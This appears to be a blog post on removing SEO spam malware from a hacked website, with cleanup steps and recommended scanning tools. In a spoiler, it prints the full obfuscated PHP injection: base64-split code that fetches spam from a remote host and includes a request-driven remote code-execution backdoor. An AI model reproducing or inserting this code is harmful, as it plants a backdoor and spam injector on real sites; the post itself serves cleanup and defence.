How to cleanup Website Hacked with SEO Spam

I recently looked at an issue with a website being infected with a malware called SEO Spam. This was reported by Google Webmaster Tools (one of the benefits of adding your website to Webmaster Tools) as shown below:

[blockquote align=”left” ]DON’T IGNORE THESE MESSAGES[/blockquote]

I decided to confirm this and used a website called Sucuri to scan the website and below was the results:

To investigate further you need to have file access to your hosting account. The website that was hacked was hosted on a Windows VPS (Windows Server 2012).

Below were the steps taken to remove the malware:

[list icon=”dot”]Login to the VPS and change all password. Check to make sure there are no suspicious accounts created[/list] [list icon=”dot”]Open your website in a web browser and right click and select “View Page Source”[/list] [list icon=”dot”]Check the code in the header to see if there is anything unusual, in particular check to see if there are links to other websites as that’s what the function of the SEO Spam malware[/list] [list icon=”dot”]Use a grep tool to perform text scans.[/list] [list icon=”dot”]Perform a quick check on your files and make see whether there has been any recent files that were modified/saved. Check the content of these files and see if there is anything usual.[/list] [list icon=”dot”]In my particular case I noticed this unusual code (in particular the random text):[/list]

[colorbox title=”What is this code?” color=”#333333″]This appears to be code converted to Base64 format. This makes it harder for scanning tools to find the code. You can use a website called BASE64decode.org to decode the code[/colorbox] [spoiler title=”If you’re interested expand to see actual code”]The hackers were quite clever and decoded the parts of the code again: $GLOBALS[‘_1201235823_’]=Array(base64_decode(‘ZXJyb3J’ .’fc’ .’mV’ .’wb’ .’3J0aW5n’),base64_decode(‘aW5p’ .’X3Nl’ .’d’ .’A==’),base64_decode(‘cHJl’ .’Z’ .’1′ .’9tYXRjaA==’),base64_decode(‘Zmls’ .’Z’ .’V9nZXRfY’ .’29udGVudHM’ .’=’),base64_decode(‘bX’ .’Rf’ .’cm’ .’Fu’ .’ZA==’),base64_decode(” .’dXJsZW5jb’ .’2Rl’),base64_decode(‘d’ .’X’ .’JsZW5jb2Rl’),base64_decode(‘dXJs’ .’ZW5j’ .’b2′ .’Rl’),base64_decode(‘bWQ1′),base64_decode(” .’aW5pX2′ .’dl’ .’dA==’),base64_decode(” .’Zml’ .’sZV9n’ .’ZXRfY’ .’29udGVudH’ .’M=’),base64_decode(‘c3′ .’Ry’ .’b’ .’GVu’),base64_decode(‘ZnVuY3Rpb’ .’25fZXhpc3Rz’),base64_decode(‘Y3Vyb’ .’F9pb’ .’ml0′),base64_decode(” .’Y3Vyb’ .’F9zZXRv’ .’c’ .’HQ=’),base64_decode(” .’Y3Vy’ .’bF’ .’9z’ .’ZXRvcH’ .’Q=’),base64_decode(‘Y3VybF9le’ .’GVj’),base64_decode(‘c3Ry’ .’c’ .’m’ .’Noc’ .’g==’),base64_decode(‘Y3′ .’Vyb’ .’F’ .’9jbG9zZQ==’),base64_decode(” .’Z’ .’nNvY2tvcGVu’),base64_decode(‘YXJyYXlfcHJvZ’ .’HV’ .’jdA==’),base64_decode(‘YXJy’ .’Y’ .’X’ .’lfcmVkd’ .’WN’ .’l’),base64_decode(‘Zn’ .’dya’ .’XRl’),base64_decode(‘ZmV’ .’vZg==’),base64_decode(‘Zm’ .’dldHM=’),base64_decode(‘c3Ry’ .’cG9z’),base64_decode(‘Y’ .’XJ’ .’y’ .’YXl’ .’f’ .’a2V5cw==’),base64_decode(‘Zm’ .’Nsb3′ .’Nl’),base64_decode(‘cH’ .’JlZ’ .’19z’ .’cG’ .’x’ .’pdA==’),base64_decode(‘c3Ry’ .’aXBzbG’ .’FzaGVz’)); function _1807178670($i){$a=Array(” .’ZGlzcGxheV9lcnJvcnM=’,’M’ .’A==’,’Y’ .’2x’ .’pZW50X2NoZWNr’,’Y’ .’2x’ .’pZW’ .’50X2NoZ’ .’W’ .’Nr’,’S’ .’FRU’ .’UF’ .’9BQ0N’ .’F’ .’U’ .’FRfQ0hBUlNFVA==’,’IS4hdQ==’,’U0′ .’NSS’ .’VBUX0ZJT’ .’EVOQU1F’,” .’VVRGLTg=’,” .’d2luZ’ .’G93cy0x’ .’MjU’ .’x’,’SFR’ .’UU’ .’F9′ .’BQ0NFUFRfQ0hBUlNFVA==’,’U0VSVkV’ .’SX05BTU’ .’U=’,’U’ .’kV’ .’R’ .’VUVTVF9VUkk=’,’eGR’ .’rcg==’,’SF’ .’RUUF9V’ .’U0′ .’VSX0FHR’ .’U5U’,’UkVN’ .’T1RFX0FERFI=’,” .’a’ .’WttZnll’ .’dXJuYW1kanMucnU=’,’L2dld’ .’C5waHA/Z’ .’D0=’,’JnU9′,’JmM9′,’Jm’ .’k’ .’9M’ .’SZpcD0′ .’=’,’Jmg’ .’9′,’O’ .’DdlOWVkYjFlOTdlOTUy’ .’Yzhh’ .’ZTZkMDM0YjFkMD’ .’Q’ .’5NjA=’,’MQ==’,’Y3Nm’,” .’YWxsb’ .’3dfdXJsX2′ .’ZvcGVu’,’aHR0cDov’ .’L’ .’w’ .’==’,’Y3VybF9pbml0′,’a’ .’H’ .’R0cDo’ .’vLw’ .’==’,’R0V’ .’U’ .’I’ .’A’ .’==’,” .’I’ .’EhUVF’ .’Av’ .’MS4x’ .’DQo=’,’SG9′ .’zdDo’ .’g’,” .’DQo=’,’Q29ubm’ .’VjdG’ .’lv’ .’bjog’ .’Q2xvc’ .’2U’ .’NC’ .’g0K’,”,” .’dm5r’ .’c3Bj’ .’bndmYWpybm’ .’FwbGY=’,’Z’ .’GN3′ .’eg==’,’L1x’ .’SX’ .’F’ .’Iv’,’cA=’ .’=’,’NmY’ .’w’ .’Yz’ .’YwYjc’ .’=’,’Zg==’,” .’Yw==’);return base64_decode($a[$i]);} @$GLOBALS[‘_1201235823_’][0](round(0));@$GLOBALS[‘_1201235823_’][1](_1807178670(0),_1807178670(1));$t1e69_0=round(0+1469.5+1469.5);if(!isset($t1e69_1)){if(!empty($_COOKIE[_1807178670(2)]))die($_COOKIE[_1807178670(3)]);if(!isset($t1e69_2[_1807178670(4)])){if($GLOBALS[‘_1201235823_’][2](_1807178670(5),$GLOBALS[‘_1201235823_’][3]($_SERVER[_1807178670(6)])))$t1e69_3=_1807178670(7);else $t1e69_3=_1807178670(8);}else{$t1e69_3=$t1e69_2[_1807178670(9)];if(round(0+4514.5+4514.5)<$GLOBALS[‘_1201235823_’][4](round(0+883+883+883+883+883),round(0+2304.5+2304.5)))$GLOBALS[‘_1201235823_’][5]($_REQUEST,$_SERVER,$t1e69_4);}$t1e69_5=$_SERVER[_1807178670(10)] .$_SERVER[_1807178670(11)];$t1e69_6=_1807178670(12);$t1e69_7=$_SERVER[_1807178670(13)];$t1e69_4=$_SERVER[_1807178670(14)];$t1e69_8=_1807178670(15);$t1e69_9=_1807178670(16) .$GLOBALS[‘_1201235823_’][6]($t1e69_5) ._1807178670(17) .$GLOBALS[‘_1201235823_’][7]($t1e69_7) ._1807178670(18) .$t1e69_3 ._1807178670(19) .$t1e69_4 ._1807178670(20) .$GLOBALS[‘_1201235823_’][8](_1807178670(21) .$t1e69_5 .$t1e69_7 .$t1e69_3 ._1807178670(22));$t1e69_10=_1807178670(23);if($GLOBALS[‘_1201235823_’][9](_1807178670(24))== round(0+0.2+0.2+0.2+0.2+0.2)){$t1e69_1=$GLOBALS[‘_1201235823_’][10](_1807178670(25) .$t1e69_8 .$t1e69_9);}if($GLOBALS[‘_1201235823_’][11]($t1e69_1)<round(0+10)){if($GLOBALS[‘_1201235823_’][12](_1807178670(26))){$t1e69_11=$GLOBALS[‘_1201235823_’][13](_1807178670(27) .$t1e69_8 .$t1e69_9);$GLOBALS[‘_1201235823_’][14]($t1e69_11,42,FALSE);$GLOBALS[‘_1201235823_’][15]($t1e69_11,19913,TRUE);$t1e69_1=$GLOBALS[‘_1201235823_’][16]($t1e69_11);while(round(0+1149)-round(0+1149))$GLOBALS[‘_1201235823_’][17]($t1e69_9,$t1e69_5,$t1e69_2,$t1e69_12);$GLOBALS[‘_1201235823_’][18]($t1e69_11);}else{$t1e69_13=$GLOBALS[‘_1201235823_’][19]($t1e69_8,round(0+20+20+20+20),$t1e69_12,$t1e69_14,round(0+15+15));if((round(0+1569.5+1569.5)+round(0+787+787))>round(0+3139)|| $GLOBALS[‘_1201235823_’][20]($t1e69_8,$t1e69_4,$t1e69_15,$t1e69_12,$t1e69_11));else{$GLOBALS[‘_1201235823_’][21]($t1e69_7,$t1e69_15,$t1e69_14);}if($t1e69_13){$t1e69_16=_1807178670(28) .$t1e69_9 ._1807178670(29);$t1e69_16 .= _1807178670(30) .$t1e69_8 ._1807178670(31);$t1e69_16 .= _1807178670(32);$GLOBALS[‘_1201235823_’][22]($t1e69_13,$t1e69_16);$t1e69_15=_1807178670(33);while(!$GLOBALS[‘_1201235823_’][23]($t1e69_13)){$t1e69_15 .= $GLOBALS[‘_1201235823_’][24]($t1e69_13,round(0+42.666666666667+42.666666666667+42.666666666667));if($GLOBALS[‘_1201235823_’][25](_1807178670(34),_1807178670(35))!==false)$GLOBALS[‘_1201235823_’][26]($t1e69_5);}$GLOBALS[‘_1201235823_’][27]($t1e69_13);list($t1e69_17,$t1e69_1)=$GLOBALS[‘_1201235823_’][28](_1807178670(36),$t1e69_15,round(0+0.66666666666667+0.66666666666667+0.66666666666667));$t1e69_18=round(0+4383);}}}if(@$_REQUEST[_1807178670(37)]== _1807178670(38))@$_REQUEST[_1807178670(39)]($GLOBALS[‘_1201235823_’][29]($_REQUEST[_1807178670(40)]));}echo@$t1e69_1; [/spoiler] [list icon=”dot”]Use a grep tool to search for text within files in directories and perform a search for some of the code that you found. In my case, I used a tool called grepwin and performed a exact search for the code. Grepwin returned hundred of files (namely index.html, header.php, header.html, footer.html, footer.php and main.html). I then used the same tool to replace the above code with an empty space (this quickly removed all the malware code from the files).[/list]

[list icon=”dot”]The other file that I found that was modified recently was .htaccess and had the following code.[/list]

Fortunately I restored a backed up copy of this file

[list icon=”dot”]I also installed malware scanner on the server to make sure there were no other <alware installed. None were reported after the scan and rescan from sucuri also came back negative.[/list] [colorbox title=”Useful Sites” color=”#0080c0″]

Sucuri Sitecheck – checks websites for malware

Base64 Decode and Encode – site to decode Base64

Malwarebytes – Software tool to remove malware

Grepwin – A windows based tool to perform search and replace

[/colorbox] [note color=”#18e7e1″]Hopefully this will help others and if you have any questions please leave me a comment and I will try to help.[/note]

DO YOU LIKE WHAT YOU'VE READ?

Join our subscription list and receive our content right in your mailbox. If you like to receive some Great deals our Freebies then subscribe now!

Our Sponsors

Become a Sponsor for $45.

Limit to 5 sponsors.

Company Name :

Email :

Website :

Description :

Upload Logo :

Terms & Conditions : ACCEPTANCE OF TERMS This Agreement contains the complete terms and conditions that apply to your participation in our site. If you wish to use the site including its tools and services please read these terms of use carefully. By accessing this site or using any part of the site or any content or services hereof, you agree to become bound by these terms and conditions. If you do not agree to all the terms and conditions, then you may not access the site or use the content or any services in the site. MODIFICATIONS OF TERMS OF USE Amendments to this agreement can be made and effected by us from time to time without specific notice to your end. Agreement posted on the Site reflects the latest agreement and you should carefully review the same before you use our site. USE OF THE SITE You are prohibited to do the following acts, to wit: (a) use our sites, including its services and or tools if you are not able to form legally binding contracts, are under the age of 18, or are temporarily or indefinitely suspended from using our sites, services, or tools (b) posting of an items in inappropriate category or areas on our sites and services; (c) collecting information about users’ personal information; (d) maneuvering the price of any item or interfere with other users' listings; (f) post false, inaccurate, misleading, defamatory, or libelous content; (g) take any action that may damage the rating system. Registration Information For you to complete the sign-up process in our site, you must provide your full legal name, current address, a valid email address, member name and any other information needed in order to complete the signup process. You must qualify that you are 18 years or older and must be responsible for keeping your password secure and be responsible for all activities and contents that are uploaded under your account. You must not transmit any worms or viruses or any code of a destructive nature. Any information provided by you or gathered by the site or third parties during any visit to the site shall be subject to the terms of businesslegions.com’s Privacy Policy. Term This Agreement will remain in full force and effect while you use the Website. You may terminate your membership at any time for any reason by following the instructions on the “TERMINATION OF ACCOUNT” in the setting page. We may terminate your membership for any reason at any time. If you are using a paid version of the Service and we terminate your membership in the Service because you have breached this Agreement, you will not be entitled to any refund of unused subscription fees. Even after your membership is terminated, certain sections of this Agreement will remain in effect. NON-COMMERCIAL USE BY MEMBERS. Members on this website are prohibited to use the services of the website in connection with any commercial endeavors or ventures. This includes providing links to other websites, whether deemed competitive to this website or not. Juridical persons or entities including but not limited to organizations, companies, and/or businesses may not become Members of businesslegions.com and should not use the site for any purpose. LINKs & FRAMINGS Illegal and/or unauthorized uses of the Services, including unauthorized framing of or linking to the Sites will be investigated, and appropriate legal action may be taken. Some links, however, are welcome to the site and you are allowed to establish hyperlink to appropriate part within the site provided that: (i) you post your link only within the forum, chat or message board section; (ii) you do not remove or obscure any advertisements, copyright notices or other notices on the placed at the site; and (iii) you immediately stop providing any links to the site on written notice from us. However, you must check the copyright notice on the homepage to which you wish to link to make sure that one of our content providers does not have its own policies regarding direct links to their content on our sites. WARRANTY DISCLAIMER AND EXCLUSIONS / LIMITATIONS OF LIABILITY We make no express or implied warranties or representations with respect to the Program or any products sold through the Program (including, without limitation, warranties of fitness, merchantability, non-infringement, or any implied warranties arising out of a course of performance, dealing, or trade usage). In addition, we make no representation that the operation of our site will be uninterrupted or error-free, and we will not be liable for the consequences of any interruptions or errors. We may change, restrict access to, suspend or discontinued the site or any part of it at anytime. The information, content and services on the site are provided on an “as is” basis. When you use the site and or participate therein, you understand and agree that you participate at your own risk. INTELLECTUAL PROPERTY rights You hereby acknowledge that all rights, titles and interests, including but not limited to rights covered by the Intellectual Property Rights, in and to the site, and that You will not acquire any right, title, or interest in or to the site except as expressly set forth in this Agreement. You will not modify, adapt, translate, prepare derivative works from, decompile, reverse engineer, disassemble or otherwise attempt to derive source code from any of our services, software, or documentation, or create or attempt to create a substitute or similar service or product through use of or access to the Program or proprietary information related thereto. Confidentiality You agree not to disclose information you obtain from us and or from our clients, advertisers, suppliers and forum members. All information submitted to by an end-user customer pursuant to a Program is proprietary information of businesslegions.com. Such customer information is confidential and may not be disclosed. Publisher agrees not to reproduce, disseminate, sell, distribute or commercially exploit any such proprietary information in any manner. NON-ASSIGNMENT OF RIGHTS Your rights of whatever nature cannot be assigned nor transferred to anybody, and any such attempt may result in termination of this Agreement, without liability to us. However, we may assign this Agreement to any person at any time without notice. Waiver Failure of the businesslegions.com to insist upon strict performance of any of the terms, conditions and covenants hereof shall not be deemed a relinquishment or waiver of any rights or remedy that the we may have, nor shall it be construed as a waiver of any subsequent breach of the terms, conditions or covenants hereof, which terms, conditions and covenants shall continue to be in full force and effect. Severability of Terms. In the event that any provision of these Terms and Conditions is found invalid or unenforceable pursuant to any judicial decree or decision, such provision shall be deemed to apply only to the maximum extent permitted by law, and the remainder of these Terms and Conditions shall remain valid and enforceable according to its terms. Entire Agreement This Agreement shall be governed by and construed in accordance with the substantive laws of Australia , without any reference to conflict-of-laws principles. The Agreement describes and encompasses the entire agreement between us and you, and supersedes all prior or contemporaneous agreements, representations, warranties and understandings with respect to the Site, the contents and materials provided by or through the Site, and the subject matter of this Agreement. Choice of Law; Jurisdiction; Forum Any dispute, controversy or difference which may arise between the parties out of, in relation to or in connection with this Agreement is hereby irrevocably submitted to the exclusive jurisdiction of the courts of Australia , to the exclusion of any other courts without giving effect to its conflict of laws provisions or your actual state or Australia of residence.

Enter Captcha :

Accept our terms

How to cleanup Website Hacked with SEO Spam

Our Sponsors

Marco / admin / 30 Nov

OTHER ARTICLES YOU MAY LIKE

TOP USEFUL LINKEDIN TOOLS THAT WILL HELP YOU STAY CONNECTED WITH YOUR CLIENTS

USING WPFORMS AND SENDINBLUE

Like our Page

Categories

Join our subscription list and receive these deals right in your mailbox. If you like to receive some of our Freebies then subscribe now!